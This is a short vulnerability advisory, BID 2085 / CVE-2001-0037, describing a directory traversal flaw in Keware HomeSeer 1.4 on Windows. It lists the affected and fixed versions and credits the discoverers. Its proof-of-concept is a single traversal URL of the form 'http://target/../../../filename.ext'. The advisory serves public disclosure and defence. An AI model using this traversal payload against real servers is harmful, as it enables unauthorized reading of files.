BID:2085

Keware Technologies HomeSeer Directory Traversal Vulnerability

Info

Keware Technologies HomeSeer Directory Traversal Vulnerability

Bugtraq ID:	2085
Class:	Input Validation Error
CVE:	CVE-2001-0037
Remote:	Yes
Local:	Yes
Published:	Dec 07 2000 12:00AM
Updated:	Jul 11 2009 03:56AM
Credit:	Discovered and posted to Bugtraq by SNS Research <[email protected]> on Dec 7, 2000.
Vulnerable:	Keware Technologies HomeSeer 1.4 - Microsoft Windows 2000 Professional - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows NT 4.0

Not Vulnerable:	Keware Technologies HomeSeer 1.4.29 beta - Microsoft Windows 2000 Professional - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows NT 4.0

Exploit / POC

Keware Technologies HomeSeer Directory Traversal Vulnerability

The following example has been provided by SNS Research <[email protected]>:

http://target/../../../filename.ext

References

Keware Technologies HomeSeer Directory Traversal Vulnerability

References:

HomeSeer Homepage (Keware Technologies)